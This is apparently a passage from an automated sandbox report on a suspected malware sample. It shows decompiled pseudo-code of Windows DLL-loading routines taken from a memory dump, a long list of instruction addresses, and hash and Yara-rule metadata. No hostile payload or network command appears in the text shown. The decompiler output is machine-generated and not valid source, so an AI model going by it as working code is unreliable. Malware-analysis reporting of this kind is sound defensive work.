														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E047EFFB0(_t287, _t353, 0x48c84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0482CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E047E6600(0x48c52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E047E7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x48cb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0485E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x48c8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x48cb218; // 0x0
														asm("ror edi, cl");
														 *0x48cb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E047F2280(_t250, 0x48c84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04813898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E047EFFB0(_t293, _t353, 0x48c84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E048137F5(_t353, 0);
																}
																E04810413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04809B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E048002D6(_t174);
																}
																L047F77F0( *0x48c7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0480C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L047EEC7F(_t353);
										L048019B8(_t287, 0, _t353, 0);
										_t200 = E047DF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0481B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x48cb2f8; // 0xd40000
									if((_t206 |  *0x48cb2fc) == 0 || ( *0x48cb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x48cb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E04886B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E04886AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E047EE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L047EEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04819730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E047EE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L047E8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04813C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                        0x047ed5f2
                                                        0x047ed5f5
                                                        0x047ed5f5
                                                        0x047ed5fd
                                                        0x047ed600
                                                        0x047ed60a
                                                        0x047ed60d
                                                        0x047ed617
                                                        0x047ed61d
                                                        0x047ed627
                                                        0x047ed62e
                                                        0x047ed911
                                                        0x047ed913
                                                        0x00000000
                                                        0x047ed919
                                                        0x047ed919
                                                        0x047ed919
                                                        0x047ed634
                                                        0x047ed634
                                                        0x047ed634
                                                        0x047ed634
                                                        0x047ed640
                                                        0x047ed8bf
                                                        0x00000000
                                                        0x047ed646
                                                        0x047ed646
                                                        0x047ed64d
                                                        0x047ed652
                                                        0x0483b2fc
                                                        0x0483b2fc
                                                        0x0483b302
                                                        0x0483b33b
                                                        0x0483b341
                                                        0x00000000
                                                        0x0483b304
                                                        0x0483b304
                                                        0x0483b319
                                                        0x0483b31e
                                                        0x0483b324
                                                        0x0483b326
                                                        0x0483b332
                                                        0x0483b347
                                                        0x0483b34c
                                                        0x0483b351
                                                        0x0483b35a
                                                        0x00000000
                                                        0x0483b328
                                                        0x0483b328
                                                        0x00000000
                                                        0x0483b328
                                                        0x0483b326
                                                        0x047ed658
                                                        0x047ed658
                                                        0x047ed65b
                                                        0x047ed665
                                                        0x00000000
                                                        0x047ed66b
                                                        0x047ed66b
                                                        0x047ed66b
                                                        0x047ed66b
                                                        0x047ed66d
                                                        0x047ed672
                                                        0x047ed67a
                                                        0x00000000
                                                        0x00000000
                                                        0x047ed680
                                                        0x047ed686
                                                        0x047ed8ce
                                                        0x047ed8d4
                                                        0x047ed8da
                                                        0x047ed8dd
                                                        0x047ed8dd
                                                        0x047ed8e0
                                                        0x047ed68c
                                                        0x047ed691
                                                        0x047ed69d
                                                        0x047ed6a2
                                                        0x047ed6a7
                                                        0x047ed6b0
                                                        0x047ed6b0
                                                        0x047ed6b5
                                                        0x047ed6e0
                                                        0x047ed6b7
                                                        0x047ed6b7
                                                        0x047ed6b9
                                                        0x047ed6b9
                                                        0x047ed6bb
                                                        0x047ed6bd
                                                        0x047ed6ce
                                                        0x047ed6d0
                                                        0x047ed6d2
                                                        0x0483b363
                                                        0x0483b365
                                                        0x00000000
                                                        0x0483b36b
                                                        0x00000000
                                                        0x0483b36b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047ed6bf
                                                        0x047ed6bf
                                                        0x047ed6e5
                                                        0x047ed6e7
                                                        0x047ed6e9
                                                        0x047ed6e9
                                                        0x047ed6ec
                                                        0x047ed6ec
                                                        0x047ed6ef
                                                        0x047ed6f5
                                                        0x047ed6f9
                                                        0x047ed6fb
                                                        0x047ed6fd
                                                        0x047ed701
                                                        0x047ed703
                                                        0x047ed70a
                                                        0x047ed70a
                                                        0x047ed70a
                                                        0x047ed701
                                                        0x047ed70d
                                                        0x047ed710
                                                        0x047ed710
                                                        0x047ed6c1
                                                        0x047ed6c1
                                                        0x047ed6c1
                                                        0x047ed6c6
                                                        0x0483b36d
                                                        0x0483b36f
                                                        0x00000000
                                                        0x0483b375
                                                        0x0483b375
                                                        0x0483b375
                                                        0x00000000
                                                        0x0483b375
                                                        0x00000000
                                                        0x047ed6cc
                                                        0x047ed6d8
                                                        0x047ed6d8
                                                        0x047ed6d8
                                                        0x00000000
                                                        0x047ed6c6
                                                        0x047ed6bf
                                                        0x00000000
                                                        0x047ed6da
                                                        0x047ed6da
                                                        0x047ed716
                                                        0x047ed71b
                                                        0x047ed720
                                                        0x047ed726
                                                        0x047ed726
                                                        0x047ed72d
                                                        0x00000000
                                                        0x047ed733
                                                        0x047ed739
                                                        0x047ed742
                                                        0x047ed750
                                                        0x047ed758
                                                        0x047ed764
                                                        0x047ed776
                                                        0x047ed77a
                                                        0x047ed783
                                                        0x047ed928
                                                        0x047ed92c
                                                        0x047ed93d
                                                        0x047ed944
                                                        0x047ed94f
                                                        0x047ed954
                                                        0x047ed956
                                                        0x047ed95f
                                                        0x047ed961
                                                        0x047ed973
                                                        0x047ed973
                                                        0x047ed956
                                                        0x047ed944
                                                        0x047ed92c
                                                        0x047ed78b
                                                        0x0483b394
                                                        0x047ed791
                                                        0x047ed798
                                                        0x0483b3a3
                                                        0x0483b3bb
                                                        0x0483b3bb
                                                        0x047ed7a5
                                                        0x047ed866
                                                        0x047ed870
                                                        0x047ed884
                                                        0x047ed892
                                                        0x047ed898
                                                        0x047ed89e
                                                        0x047ed8a0
                                                        0x047ed8a6
                                                        0x047ed8ac
                                                        0x047ed8ae
                                                        0x047ed8b4
                                                        0x047ed8b4
                                                        0x047ed8ae
                                                        0x047ed7a5
                                                        0x047ed78b
                                                        0x047ed7b1
                                                        0x0483b3c5
                                                        0x0483b3c5
                                                        0x047ed7c3
                                                        0x047ed7ca
                                                        0x047ed7e5
                                                        0x047ed7eb
                                                        0x047ed8eb
                                                        0x047ed8ed
                                                        0x00000000
                                                        0x047ed8f3
                                                        0x047ed8f3
                                                        0x047ed8f3
                                                        0x00000000
                                                        0x047ed8ed
                                                        0x047ed7cc
                                                        0x047ed7cc
                                                        0x047ed7d2
                                                        0x00000000
                                                        0x047ed7d4
                                                        0x047ed7d4
                                                        0x047ed7d7
                                                        0x047ed7df
                                                        0x0483b3d4
                                                        0x0483b3d9
                                                        0x0483b3dc
                                                        0x0483b3dc
                                                        0x0483b3df
                                                        0x0483b3e2
                                                        0x0483b468
                                                        0x0483b46d
                                                        0x0483b46f
                                                        0x0483b46f
                                                        0x0483b475
                                                        0x047ed8f8
                                                        0x047ed8f9
                                                        0x047ed8fd
                                                        0x0483b3e8
                                                        0x0483b3e8
                                                        0x0483b3eb
                                                        0x0483b3ed
                                                        0x00000000
                                                        0x0483b3ef
                                                        0x0483b3ef
                                                        0x0483b3f1
                                                        0x0483b3f4
                                                        0x0483b3fe
                                                        0x0483b404
                                                        0x0483b409
                                                        0x0483b40e
                                                        0x0483b410
                                                        0x0483b410
                                                        0x0483b414
                                                        0x0483b414
                                                        0x0483b41b
                                                        0x0483b420
                                                        0x0483b423
                                                        0x0483b425
                                                        0x0483b427
                                                        0x0483b42a
                                                        0x0483b42d
                                                        0x0483b42d
                                                        0x0483b42a
                                                        0x0483b432
                                                        0x0483b436
                                                        0x0483b438
                                                        0x0483b43b
                                                        0x0483b43b
                                                        0x0483b449
                                                        0x0483b44e
                                                        0x0483b454
                                                        0x0483b458
                                                        0x0483b458
                                                        0x0483b45d
                                                        0x00000000
                                                        0x0483b45d
                                                        0x0483b3ed
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047ed7df
                                                        0x047ed7d2
                                                        0x047ed7ca
                                                        0x0483b37c
                                                        0x0483b37e
                                                        0x0483b385
                                                        0x0483b38a
                                                        0x00000000
                                                        0x0483b38a
                                                        0x047ed742
                                                        0x047ed7f1
                                                        0x047ed7f8
                                                        0x0483b49b
                                                        0x0483b49b
                                                        0x047ed800
                                                        0x047ed837
                                                        0x047ed843
                                                        0x047ed845
                                                        0x047ed847
                                                        0x047ed84a
                                                        0x047ed84b
                                                        0x047ed84e
                                                        0x047ed857
                                                        0x047ed802
                                                        0x047ed802
                                                        0x047ed80d
                                                        0x00000000
                                                        0x047ed818
                                                        0x047ed818
                                                        0x047ed824
                                                        0x047ed831
                                                        0x0483b4a5
                                                        0x0483b4ab
                                                        0x0483b4b3
                                                        0x0483b4b8
                                                        0x0483b4bb
                                                        0x00000000
                                                        0x0483b4c1
                                                        0x0483b4c1
                                                        0x0483b4c8
                                                        0x00000000
                                                        0x0483b4ce
                                                        0x0483b4d4
                                                        0x0483b4e1
                                                        0x0483b4e3
                                                        0x0483b4e5
                                                        0x00000000
                                                        0x0483b4eb
                                                        0x0483b4f0
                                                        0x0483b4f2
                                                        0x047edac9
                                                        0x047edacc
                                                        0x047edacf
                                                        0x047edad1
                                                        0x047edd78
                                                        0x047edd78
                                                        0x047edcf2
                                                        0x00000000
                                                        0x047edad7
                                                        0x047edad9
                                                        0x047edadb
                                                        0x00000000
                                                        0x00000000
                                                        0x047edae1
                                                        0x047edae1
                                                        0x047edae4
                                                        0x047edae6
                                                        0x0483b4f9
                                                        0x0483b4f9
                                                        0x0483b500
                                                        0x047edaec
                                                        0x047edaec
                                                        0x047edaf5
                                                        0x047edaf8
                                                        0x047edafb
                                                        0x047edb03
                                                        0x047edb11
                                                        0x047edb16
                                                        0x047edb19
                                                        0x047edb1b
                                                        0x0483b52c
                                                        0x0483b531
                                                        0x0483b534
                                                        0x047edb21
                                                        0x047edb21
                                                        0x047edb24
                                                        0x047edcd9
                                                        0x047edce2
                                                        0x047edce5
                                                        0x047edd6a
                                                        0x047edd6d
                                                        0x00000000
                                                        0x047edd73
                                                        0x0483b51a
                                                        0x0483b51c
                                                        0x0483b51f
                                                        0x0483b524
                                                        0x00000000
                                                        0x0483b524
                                                        0x047edce7
                                                        0x047edce7
                                                        0x047edce7
                                                        0x00000000
                                                        0x047edce7
                                                        0x00000000
                                                        0x047edb2a
                                                        0x047edb2c
                                                        0x047edb31
                                                        0x047edb33
                                                        0x047edb36
                                                        0x047edb39
                                                        0x047edb3b
                                                        0x047edb66
                                                        0x047edb66
                                                        0x047edb3d
                                                        0x047edb3d
                                                        0x047edb3e
                                                        0x047edb46
                                                        0x047edb47
                                                        0x047edb49
                                                        0x047edb4c
                                                        0x047edb53
                                                        0x047edb55
                                                        0x047edb58
                                                        0x047edb5a
                                                        0x0483b50a
                                                        0x0483b50f
                                                        0x0483b512
                                                        0x047edb60
                                                        0x047edb60
                                                        0x047edb63
                                                        0x047edb63
                                                        0x00000000
                                                        0x047edb63
                                                        0x047edb5a
                                                        0x047edb3b
                                                        0x047edb24
                                                        0x047edb69
                                                        0x047edb69
                                                        0x047edb6c
                                                        0x047edb6f
                                                        0x047edb74
                                                        0x0483b557
                                                        0x0483b557
                                                        0x0483b55e
                                                        0x047edb7a
                                                        0x047edb7c
                                                        0x047edb7f
                                                        0x047edb82
                                                        0x047edb85
                                                        0x00000000
                                                        0x047edb8b
                                                        0x047edb8b
                                                        0x047edb8d
                                                        0x047edb9b
                                                        0x047edb9b
                                                        0x047edb9d
                                                        0x047edba0
                                                        0x047edba2
                                                        0x047edba4
                                                        0x047edba7
                                                        0x047edba9
                                                        0x047edbae
                                                        0x047edbae
                                                        0x047edbb1
                                                        0x047edbb4
                                                        0x047edbb4
                                                        0x047edbb7
                                                        0x047edbba
                                                        0x047edcd2
                                                        0x047edcd4
                                                        0x00000000
                                                        0x047edbc0
                                                        0x047edbc0
                                                        0x047edbd2
                                                        0x047edbd7
                                                        0x047edbda
                                                        0x047edbdd
                                                        0x047edbdf
                                                        0x00000000
                                                        0x047edbe5
                                                        0x047edbe5
                                                        0x047edbee
                                                        0x047edbf1
                                                        0x0483b541
                                                        0x0483b544
                                                        0x00000000
                                                        0x0483b546
                                                        0x0483b546
                                                        0x00000000
                                                        0x0483b546
                                                        0x047edbf7
                                                        0x047edbf7
                                                        0x047edbfd
                                                        0x047edbfd
                                                        0x047edbff
                                                        0x047edc0b
                                                        0x047edc15
                                                        0x047edc1b
                                                        0x047edc1d
                                                        0x047edc21
                                                        0x047edc21
                                                        0x047edc23
                                                        0x047edc23
                                                        0x047edc26
                                                        0x047edc29
                                                        0x047edc2b
                                                        0x00000000
                                                        0x00000000
                                                        0x047edc31
                                                        0x047edc34
                                                        0x047edc36
                                                        0x047edcbf
                                                        0x047edcbf
                                                        0x047edcc2
                                                        0x00000000
                                                        0x047edc3c
                                                        0x047edc41
                                                        0x047edc43
                                                        0x00000000
                                                        0x047edc45
                                                        0x047edc45
                                                        0x047edc47
                                                        0x00000000
                                                        0x047edc4d
                                                        0x047edc4d
                                                        0x047edc50
                                                        0x047edc52
                                                        0x047edc55
                                                        0x047edcfa
                                                        0x047edcfe
                                                        0x047edd08
                                                        0x047edd0a
                                                        0x047edd0c
                                                        0x00000000
                                                        0x047edd12
                                                        0x047edd15
                                                        0x047edd2d
                                                        0x047edd2f
                                                        0x047edd32
                                                        0x047edd35
                                                        0x00000000
                                                        0x047edd35
                                                        0x047edc5b
                                                        0x047edc5b
                                                        0x047edc5e
                                                        0x047edc61
                                                        0x047edc64
                                                        0x047edc67
                                                        0x047edc67
                                                        0x047edc6a
                                                        0x047edc6c
                                                        0x047edc8e
                                                        0x047edc8e
                                                        0x047edc91
                                                        0x047edc93
                                                        0x047edcce
                                                        0x047edcce
                                                        0x047edc95
                                                        0x047edc9c
                                                        0x047edc6e
                                                        0x047edc72
                                                        0x047edc75
                                                        0x047edc77
                                                        0x047edc79
                                                        0x0483b551
                                                        0x0483b551
                                                        0x00000000
                                                        0x047edc7f
                                                        0x047edc7f
                                                        0x047edc81
                                                        0x00000000
                                                        0x047edc83
                                                        0x047edc86
                                                        0x047edc88
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047edc88
                                                        0x047edc81
                                                        0x047edc79
                                                        0x047edc6c
                                                        0x047edc55
                                                        0x047edc47
                                                        0x047edc43
                                                        0x00000000
                                                        0x047edc36
                                                        0x047edc23
                                                        0x00000000
                                                        0x047edbff
                                                        0x047edbf1
                                                        0x047edbdf
                                                        0x047edb8f
                                                        0x047edb92
                                                        0x047edb95
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047edb95
                                                        0x047edb8d
                                                        0x047edb85
                                                        0x047edb74
                                                        0x047edc9f
                                                        0x047edca2
                                                        0x047edcb0
                                                        0x047edcb0
                                                        0x047edad1
                                                        0x0483b4e5
                                                        0x0483b4c8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047ed831
                                                        0x047ed80d
                                                        0x00000000
                                                        0x047ed800
                                                        0x0483b47f
                                                        0x0483b485
                                                        0x00000000
                                                        0x0483b485
                                                        0x047ed665
                                                        0x047ed652
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc988f2e6d369338fa2dd718766babe20c093ebb1f5df1709e6e206227c568fb
                                                        • Instruction ID: 50cac78c512372543c9a7ce0ded1de26f107d4031a219d39e7590ef4c5723fbe
                                                        • Opcode Fuzzy Hash: bc988f2e6d369338fa2dd718766babe20c093ebb1f5df1709e6e206227c568fb
                                                        • Instruction Fuzzy Hash: 20E1AF70A0025ACFEB349F1AC884BB9B7B5BF49308F044799D9099B391D774BD81CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047E849B, Relevance: .3, Instructions: 290COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E047E849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x48af9c0);
				E0482D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x48c7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E047ECEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E047F2280( *[fs:0x30], 0x48c8550);
						_t139 =  *0x48c7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0480F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E047EFFB0(_t193, _t235, 0x48c8550);
								L5:
								return E0482D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E047D1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x48c7b9c; // 0x0
							_t235 = L047F4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x48c7b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0480A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E047EFFB0(_t193, _t235, 0x48c8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L047F77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
